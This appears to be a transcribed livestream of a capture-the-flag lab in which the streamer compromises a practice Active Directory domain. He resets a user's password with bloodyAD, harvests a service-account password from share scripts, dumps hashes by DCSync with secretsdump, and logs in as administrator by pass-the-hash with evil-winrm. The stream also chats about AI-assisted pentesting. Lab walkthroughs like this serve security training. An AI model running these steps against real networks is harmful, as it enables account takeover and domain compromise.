So what we do, we copy this. So we got to set the password for James. Yeah, I'll say try it out. If you like it, let me know. If there's anything you want or anything that doesn't work, let me know. I'm on Discord. You can message me directly. Maybe I should put that to be HaxrByte.com Discord. Yeah, you guys are welcome to let me know what you think. Let's do password. Let's do subscribe. YouTube. Please. I'm not going to do exclamations. I had enough of exclamations. So let's see if that works. So we're using bloody AD. We've got generic all access over James. So we're changing James's password. There we go. Password changed successfully. Let's copy that for our notes. So one thing I do want to try quickly while we are here. So share. This James. Okay, so that works. And we wanted to do shares just to see if that's maybe different. So this is different. Thank you, appreciate it. Yeah, I'm just trying to lessen friction. So it was out of just being lazy, but it works well. I use it on engagements. It's got like a lot of functionality that I get pretty excited about it. But you got what I think is really cool is not only you can swap it in and change the parameters. You've got a my vault section which lives locally in your browser cache, so you can add your own commands, like for example what did we do now? No, so we can, I just pasted this. It was not so clever. So what you can do is you can add your own command. Say net exec GitHub, and then you swap out. This will be the R host. This will be the user. This will be the password, and you can save it. And then it will live in your my commands. So if I take this, just those out, go to my commands. These are the one that lives in my local browser cache. This is not saved on the internet. You can do the same with variables. So there you see I've saved the targets. So what that allows me to do is if I put lists on there, I can do a drop down. So I can pick these. So like share, for example, or DC. Same with domain, same with usernames and passwords. And then I've also got a notes section. You can add, like for example, James shares. And it's got full markdown capability. Save the note and it's there like that. And there's another, there's a couple of other features where you can like bind them and have like groups, but yeah, it's a bit out of scope for getting off track here. It's not open source. It's just a tool that I offer for free. You're welcome to use it. Like I said, the local section saves on your local browser cache. You've got the ability to export. You've got the ability to import. you can export your whole vault and restore it. So you can back it up, restore it, clear it. You can export your all commands. You can export notes only, favorites only. You can mark these. Some of these you can mark as favorites. So for example, this one I want to mark as a favorite. Then if I go into favorites, it will list them out. The history, all the commands that I've run so far. Yeah, there's a lot of things, really a lot of things. It was built for CTFs, pen testing, and it was built for speed. And because I'm lazy, I always struggle to remember commands. I remember some of them, but not always. Okay, so I wanted this. I feel is very juicy. Scripts. We've got access to a share. Thank you. I'll take the good pen test. I don't know about good programmers, but good pen test I'll take. Thank you, Sisters Most. Appreciate that. So SMB client. Obviously, if we want to use it here, we can go SMB client. Yeah, definitely lazy. I'm definitely lazy. SMB client. So if we want to, use it here. So just if you guys are interested, I mean, so you go user James. Password will be, what was the password? That long thing. Did I save it? I'm sorry. Copy. One caveat though that I would mention is, if you're learning, it's a good idea to practice typing the commands out. But I feel like I've been around the block, so I'm allowed to be lazy. James. Then I can shares and the share name. So what you can do is you can either copy it there or you can edit it on the fly. That was, I think it was scripts. Was it scripts? Scripts. Then you can say copy save, which it takes a copy as well as it saves it in under your commands. So oops, saves it under my commands as it's got that scripts. See it there? So it was edited. Anyway, I don't want to carry on about this too much. So SMB client. It will probably put the domain BITSTREAM HSM. I'd have to do this. Yes. Okay. And there we go. What is this? This is files. So some interesting scripts. I'm assuming I want to download them. Just see if we can get the next flag. So there's a way with NetExec that you can spider the the share and download them all. But because they are so small, yeah, it's a busy file. It's probably because it's rendering everything in the browser, I'm guessing. But enjoy. I hope. So I think you can just download. I think it's just get. So get. I'll just do that one by one, in the interest of. You can do mget. I think mget. That's multiple get. Something like PS1. Yes. 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 And then you just need the bad one. Yes. Okay, so directory scripts move PS1 scripts move but scripts. Okay, now we can grep for parse. Let's have user. Cat restart pitch. Cat audit. What is this? Okay. Disk space, AD backup. That might be interesting. Automated. What's that? So SVC backup. I'm assuming that's the right password. And let me just show you why I didn't flag it when I did a grab. I didn't do case insensitive, so if I did this, it would have shown up. Just case insensitive, but sorry, pause like that. Anyways, let's copy that. Okay, that's our next flag, I'm assuming. And let's do it like this. Yeah, I mean, yeah, me too. But yeah, I just forgot about that. I always do -a as well, but grep will warn you when it's in bytes. Normally. So that will be the password. Password for SVC backup, paste, submit. Boom. Is it off to DC then? Should we try and get that? Let's try and get that, and then we're done with the range, guys. How difficult will that be though? Located on the administrator's desktop. What is the final flag? Didn't we say SVC backup had SVC backup could do secrets dump. Yes, yes, that's what I remember. So we've got SVC backup. Let's go to trusty command vault secrets dump. Potentially got 4 matches. So it's in packet secrets dump. So what did we say? SVC backup. I'm just obviously just showing off the tool. I could totally remember this command. So secrets dump will be, it's gonna be SVC dump, SVC backup. Password will be passwords, that one. It will be DC01. Secrets dump. I guess we can do a DCSync. Let's try DCSync because I think that's all we need. CTF, HaxSmarter, BITSTREAM. Okay, I think that worked. I did see the admin hash pop past. Copy of this. We probably don't need it, but it's just a habit. It's a good habit to get into, to take notes. So I don't know if it will be this easy, but we've got the NTLM. Copy. So effectively, if we go evil -RM -I DC01, oops, DC01 dot bitstream HSM -U administrator. I think it's -H. -H. Like so. That looks good. Who am I? I think that is it, boys and girls. Now, let's see if we take just that note there. That's it. It was on the desktop of the administrator. So there, desktop. There we go. There's the root flag. Type txt. Okay, HSM full cover. Is that the flag? Congrats on finishing the range. Thank you, Tyler. Don't mind if I do. And we still got 7 minutes left. Today's stream went well. Well, it didn't start off well, but thank you very much, Sister Master. I appreciate that. Sister Master. Let's see if this will work. Golf clap, yes. Thanks, guys. That was, it turned out to be, I guess, worth it restarting the range 7 times, but hey. Submit. Yes. Okay, that was cool. So complete. So that's it for. Yes, I mean that's the perfect amount, XR. Oh, look at my pretty certificate. So pretty. Okay, so I guess that is it for tonight, but we got a couple of minutes. Any questions? Something I need to just re-explain, or any questions? I mean, I stream once a week on Thursdays. I won't be streaming next week because I'll be at DEF CON. Thank you, Nolsec. It's a pleasure. I won't be streaming next week. I'll be back the week after that. I'm hoping to have a standalone video out next week somewhere. So if you subscribe to the YouTube channel, you'll probably get a notification when that video goes up. Notch, notch, wink, wink. Yeah, I mean, like I said, I stream once a week. I'm playing with the idea of streaming on Sundays too, but just to, it'll be a shorter stream, and I don't want to do a CTF. I don't want to do Hack the Box or HackSmarter on Sundays. Sundays is a bit more chilled. Tell Tyler to hack harder. I will. So on Sundays, the idea is to be a bit more chill, go through maybe some of the, some of the news, like, for example, these type of things, talking about what happened here, even potentially maybe showcasing this exploit. Excuse me. Stuff like that. Also maybe doing something with the AI flavor. And I mean, like, I don't want to teach an AI to hack better. I want to teach you to be better at using AI to hack or to use on CTFs. So that's something I'm playing with, but I'm just, yeah, I want to be, I don't want to scare people off in terms of AI. I don't want to be an AI channel, 100% not. I believe, yeah, I mean, I'm not saying using AI to solve the CTF. I'm saying using AI to teach you to be better. That's more the angle. So I want to teach the human to be better with the help of AI, if that makes sense. So yeah, not cheating. Just because that's the way the world's going. It's going to be good skill to have to do something what they call these days AI assisted pen testing. Now, it's a bit difficult when you do it with CTFs. Not difficult as it can't solve the thing. You sort of like have to rein it back and not solve it for you. So there's a couple of ways to do it where you use the MCP server to absolutely never give you the answer. It only prompts you in the right direction. So it gives you prompts to, did you try this? Did you try that? And showing you how to build something like that, for example, with AI, not using AI to get flags. That's what I'm playing with, but I'm still like thinking about it. Exos says, this is what I know, this is what I have, this is what I'm thinking, thoughts this far. Typically how I go about it, yeah. Sister Spotter says, I'm working on a local LLM aid with CTFs as you describe to help thinking, get you unstuck and help quick code example. Yeah, I mean, something similar to that. So, you know, I like the first idea I had was because this is like train your hacker brain to get better at CTFs and eventually do pen testing, is to have an AI flavor where you teach the AI brain. But like, I don't want to teach AI to get better. I mean, I still want to teach you guys how to use AI to get better. That is what I want. And I think there's a lot of potential. So the idea is maybe to let the AI do its thing and talk about what it's doing and maybe some of the ideas, and maybe, you know, answer some questions. And because I felt like I did like one Sunday stream where I felt it was a bit it was a short stream, but I feel like it can get a bit boring if you don't get a lot of people asking questions, which is not always the case. I mean, people like to see stuff. So yeah, I mean, I don't think AI, you know, the human in the loop, as they say, should always be there. I had one of my colleagues actually did a AI pen test for a company. They requested it. They wanted a web app specifically tested with AI in the mix. And he said one of the downsides was it just got like tons of vulnerabilities, tons of findings basically, that he still had to go and manually validate as the human. And he felt like that almost, you know, it found stuff that he probably wouldn't have thought about. To be fair, also in a pen test, you sort of go after the things that can give you value, whereas the AI doesn't care, right? It just goes after everything. So it doesn't care about escalating privilege or compromising the domain or getting a flag. It just, you know, if you tell it go and find the findings, it just finds the findings. It doesn't have any intent or any okay, I'm locked out. I could change my view. You know, it doesn't care about any of that. So there's no emotion, nothing. So he said it was very difficult getting through through that mountain of findings, because, you know, obviously it was there. So he had to validate them. He just couldn't leave it. So he found that challenging. Obviously the AI helped with, you know, some of the reporting, maybe, you know, a little bit. Things it's some things that it's really good with is you know, code reviews. So, and that's just because it's such a big volume. As a human, manually going through code line by line, 10,000 lines of code, you know, it's just, yeah, you get bored, you want to throw yourself, you want to, you know, don't want to do it anymore. So yeah, all the boring stuff it can definitely take. 100% with you, Nullsec. Reporting, I do like reporting too. And you know who also likes reporting? Clients. That's what they love that stuff. That's what they pay for. Evolving features, you're still around, buddy. I'm glad you didn't pass out yet. I know it must be very late for you. Yes, 100%. That's what you're selling, right? That's what they pay for. That's the only deliverable that they get. So, anyways, making bullet blocks for reports. Now that's what Alarm can help. Yes, yeah. I mean, definitely. Anything boring, it can make easier or less painful. as a tool is a win in my opinion. It's good to have you. Good to have you, Evolving Fetus. How was today's stream? Did you like it? Interesting? Well, I'm just thinking I should probably look at somebody to raid. If you're on YouTube, jump over to Twitch if you want to be part of the raid. Let's see who's... is there anybody from Info Streamers? Nobody from Info Streamers. So no, it's my pleasure. Like I said, I stream once a week on Thursdays, 8 p.m. Eastern Time, 7 p.m. Central Time. Thinking about doing a Sunday stream, but if you subscribe to my YouTube channel, you'll get a notification if I go live, and I think as well as on Twitch. So if you want to do that, go ahead. Then I'll look for somebody to... Yes, 100%. Any suggestions of who we can raid, guys? I feel like Thursdays are very quiet these days. Zero Show is on. I haven't raided him in a while. What's he busy with? Let's what he's enjoying. I don't know if you guys want to see you go paint. No offense. Science. Yeah, everyone's gaming. Oh, he's gaming too. What's this? What's this? This is interesting. Could be no. So he's reading the news. Science technologies. I rated a guy last week that he was fixing PlayStations. That was interesting. So there is a, looks like an AI agent that is doing Dante. Is that Actorbox Dante? What is that? It's just sitting there doing nothing. Computer booter. Yeah, I think it was him. I saw a stream from Tyler one time where this guy was rendered in like an alien as an alien with his own voice, but it was obviously, you know, AI and stuff, but it was some of the best quality I've ever seen. I don't know if you guys know who I'm talking about, but that was insane. The guy seemed very nice as well. He was, I think it was 3D designing. Computer booter, let's, is he gaming? Software. What is this? Yeah, good diet. Thanks, Nullsec, for joining. Appreciate it. Oh, he's gaming. Everybody's gaming. Yeah. Let's, well, I don't think you guys want to see ZeroShell paint, but otherwise I'm gonna raid computer boot, I guess. Lunar debris, let's see. No, that's, I don't think it was him. Oh, he's talking about science and stuff. Space.
They're going to be up there for another 10 or 15 years. Actually, just grabbing those and either recycle them. I mean, they're already in orbit, right? So what? Every objective is to have some kind of a space station.
Nardinia? What's that? Why is Nardinia in this? Why is he the same? I don't know what to say, people. Let's go for Nardinia. Let's learn about space. If I can find them again. Yeah. Sorry guys, thank you very much for joining my stream. I really appreciate it. Hopefully you join next week. And like I said, please subscribe and then you'll see when I go live again. Wait a minute, what is this? It's just thought somebody came online that looked a bit more interesting. Thank you guys. I appreciate it. I really appreciate it. Thank you very much. Okay, here we go. Have a great evening, great day, great weekend, and I'll catch you guys the week after next. Thank you very much. Have a good one.